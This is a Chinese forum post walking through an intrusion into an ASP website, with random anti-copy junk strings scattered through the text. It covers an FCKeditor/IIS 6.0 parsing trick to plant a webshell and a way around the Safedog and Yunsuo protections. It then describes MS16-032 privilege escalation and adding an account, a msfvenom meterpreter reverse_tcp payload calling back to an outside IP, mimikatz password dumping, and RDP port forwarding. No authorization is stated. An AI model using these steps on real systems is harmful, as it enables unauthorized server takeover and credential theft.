找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
返回列表 发新帖
查看: 2547|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* @, t, q% e3 H) V) M& n5 U

. f) V O: }3 e2 h! h1 \/ ?% f; m# ?* n6 q K* z& u7 d$ k; e$ n5 i; D. T+ b( ]% R& m( |: b$ [6 J2 D; r4 B/ S# ~% g# I8 V: d$ B( z6 o& Q! G
/ d) Q' e- \5 W8 `( |3 t

1 v P, ~* I/ X6 p" T2 }8 k* X! K
8 C3 ~$ m6 K' Q7 D3 B. b- z 一、 利用getwebshell
& f$ y4 Q# J; O5 @/ g7 D6 |! f# B
& P2 ]! \8 c+ w6 z首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
7 O6 G. s& p' g, D
9 M8 b) A# c! m( D* Y; P6 H 222.png
0 X: l% G( B' S7 d 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
- \# |6 {5 u8 T b% F333.png
& w# q1 C. H) s% M5 l% l 下面我们构造一个asp目录,如: % M( G9 ~8 y& F' O8 \

$ i: e6 p/ M5 J& i1 D

+ R; M5 g* H2 Z% M3 u1 c http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 8 M& f' E6 I% Z1 o K

! q# h# r" i- G: @7 P. T8 S

9 M, x- H3 E2 W$ `" w" @. o9 Q 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
6 y) @! R3 l) ]' I ]* v
0 w9 i! O9 k6 m5 y 一、 绕过安全狗云锁提权并且加账号
; W$ J# F! L6 l9 z0 \0 k6 u 444.png
5 S( T- e# y2 r4 ~6 N: `% m% p没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
5 W4 F2 u# r; c; X8 k3 F
; S: d8 [: y) G$ M; J如图:
3 U* |0 {% d3 k* B" _555.png
4 w4 e4 ~7 U6 c) k c% F 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
/ a3 {& k0 I% Y2 z1 E
2 L6 h; m, w4 e! O. x% P9 p! K一、 利用metasploit
" o2 r) d7 h& y
+ c) N0 t* J: H, X! a 首先用pentestbox生成一个64位的payload如下命令
- |4 [1 z+ p. _( h5 E' N5 `
9 I3 K4 e' C$ ~5 i. D; nmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
T: J* ~ ~2 r' T1 }8 x3 Y& G. j2 O
+ A5 {. p. P! B5 k; K 为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
& N( J2 t. W! [& \ 11.png
# F/ b! b8 k3 M6 F; Z! f T下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
8 i5 A, U9 @3 D" [5 x2 ~ 13.png
' b% t7 U9 k @下面我们来做一个监听如下命令:
( ]5 A4 \: ^3 q' Q
0 f% o5 r7 P0 ?$ V portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
4 x+ g* {5 S/ l; C" U 18.png $ R7 e. {" x4 c+ x

0 q! ~2 p. F6 \
8 w: J$ E' k) @6 {

/ B p {, w5 V5 j* V c

. `8 Y& p/ z3 m
0 Y! x: ~$ B1 B
$ @% h! H9 N. p% P0 E: Y; G; x5 g 1 O1 S2 z$ c1 L" |$ s- o& L3 @

" d1 `3 Y y; Z2 P9 V# Q+ {
f7 |2 |$ Z4 t( S3 P& Z/ X j5 d3 V- ^5 ~7 d: w! F7 u

- M$ y/ O @3 ]) U
' u6 _ I) D8 B3 b% T

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表